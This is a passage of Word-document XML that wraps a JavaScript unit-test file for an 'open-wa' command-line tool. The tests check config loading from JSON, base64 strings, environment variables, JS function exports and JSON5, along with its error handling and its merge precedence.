          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        it('should export helptext string', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { helptext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expect(typeof helptext).toBe('string');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(helptext.length).toBeGreaterThan(0);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contain CLI usage information', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            const { helptext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contain some expected content</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(helptext).toContain('open-wa');</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describe('File Utils - tryOpenFileAsObject()', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // These tests require mocking fs operations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undefined for non-existent file', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const { tryOpenFileAsObject } = await import('../file-utils');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result = await tryOpenFileAsObject('/non/existent/path/config.json');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expect(result).toBeUndefined();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describe('configFile()', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const tmpDir = path.join(__dirname, '__tmp_test__');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 Create temp directory for test files</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 Clean up temp directory</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 Clear relevant env vars</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        delete process.env.WA_CLI_CONFIG;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empty object when no config file exists', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const originalCwd = process.cwd();</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.chdir(tmpDir);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expect(result).toEqual({});</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process.chdir(originalCwd);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JSON config file', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'test-config.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'test-session', port: 9000 };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(testConfig));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expect(result.sessionId).toBe('test-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(9000);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.confPath).toBe(configPath);</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base64 encoded config', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'base64-session', port: 7000 };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const base64Config = Buffer.from(JSON.stringify(testConfig)).toString('base64');</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configFile(base64Config);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expect(result.sessionId).toBe('base64-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(result.port).toBe(7000);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WA_CLI_CONFIG env var when no explicit config provided', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'env-config.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'env-session' };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(testConfig));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        process.env.WA_CLI_CONFIG = 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expect(result.sessionId).toBe('env-session');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delete process.env.WA_CLI_CONFIG;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look for cli.config.json in directory when path is a directory', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const subDir = path.join(tmpDir, 'config-dir');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.mkdirSync(subDir, { recursive: true });</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(subDir, 'cli.config.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const testConfig = { sessionId: 'dir-session' };</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify(testConfig));</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configFile(subDir);</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expect(result.sessionId).toBe('dir-session');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fs.rmSync(subDir,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describe('JS Config with async default export', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const tmpDir = path.join(__dirname, '__tmp_js_test__');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cli.config.js with object export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-object.js');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module.exports = {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    default: {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        sessionId: 'js-object-session',</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        port: 8001</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expect(result.sessionId).toBe('js-object-session');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8001);</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cli.config.js with sync function export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-sync-fn.js');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function(sessionId) {</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sessionId: 'sync-fn-' + sessionId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        port: 8002</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 Set the session ID that will be passed to the function</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            process.env.CURRENT_SESSION_ID = 'test-id';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expect(result.sessionId).toBe('sync-fn-test-id');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8002);</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delete process.env.CURRENT_SESSION_ID;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load cli.config.js with async function export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-async-fn.js');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async function(sessionId) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // Simulate async operation</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    await new Promise(resolve =&gt; setTimeout(resolve, 10));</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        sessionId: 'async-fn-' + sessionId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        port: 8003</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process.env.CURRENT_SESSION_ID = 'async-test';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expect(result.sessionId).toBe('async-fn-async-test');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8003);</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delete process.env.CURRENT_SESSION_ID;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support Promise-returning default export', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'config-promise.js');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async (sessionId) =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return Promise.resolve({</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        sessionId: 'promise-' + sessionId,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        port: 8004,</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        licenseKey: 'test-key'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process.env.CURRENT_SESSION_ID = 'promise-test';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expect(result.sessionId).toBe('promise-promise-test');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.port).toBe(8004);</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result.licenseKey).toBe('test-key');</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delete process.env.CURRENT_SESSION_ID;</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describe('Config Merging Precedence', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // These tests verify the correct precedence order:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // 1. CLI flags (highest priority)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // 2. Config file</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // 3. Environment variables</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    // 4. Defaults (lowest priority)</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tmpDir = path.join(__dirname, '__tmp_precedence__');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process.env = { ...originalEnv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use defaults when no other config provided', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        // This is tested implicitly through envArgs and optionKeysWithDefaults</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const { optionKeysWithDefalts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expect(optionKeysWithDefalts).toContain('popup');</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merge config file values over defaults', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'merge-test.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, JSON.stringify({ sessionId: 'file-session'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expect(result.sessionId).toBe('file-session');</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describe('Negative Tests - Error Handling', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const tmpDir = path.join(__dirname, '__tmp_negative__');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malformed JSON gracefully', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'malformed.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath, '{ invalid json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expect(configFile(configPath)).rejects.toThrow();</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return empty object for non-existent config path', async () =&gt;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configFile('/definitely/not/a/real/path/config.json');</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Should not throw, just return empty or log error</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        expect(typeof result).toBe('object');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empty config file', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'empty.json');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        fs.writeFileSync(configPath,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Empty file should either throw or return empty object</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            await expect(configFile(configPath)).rejects.toThrow();</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JS config that throws', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'throwing.js');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function() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    throw new Error('Config error!');</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await expect(configFile(configPath)).rejects.toThrow();</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JS config returning non-object', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const configPath = path.join(tmpDir, 'non-object.js');</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        const jsContent = `</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">exports.default = function() {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    return "not an object";</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Behavior depends on implementation - may return the string or empty object</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            // This test documents actual behavior</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            expect(result).toBeDefined();</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describe('JSON5 Support', () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">    const tmpDir = path.join(__dirname, '__tmp_json5__');</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beforeAll(()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fs.mkdirSync(tmpDir, { recursive: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afterAll(() =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">        if (fs.existsSync(tmpDir)) {</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">            fs.rmSync(tmpDir, { recursive: true, force: true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parse JSON with comments (JSON5)', async () =&gt; {</w:t>
      </w:r>
    </w:p>
    <w:p>
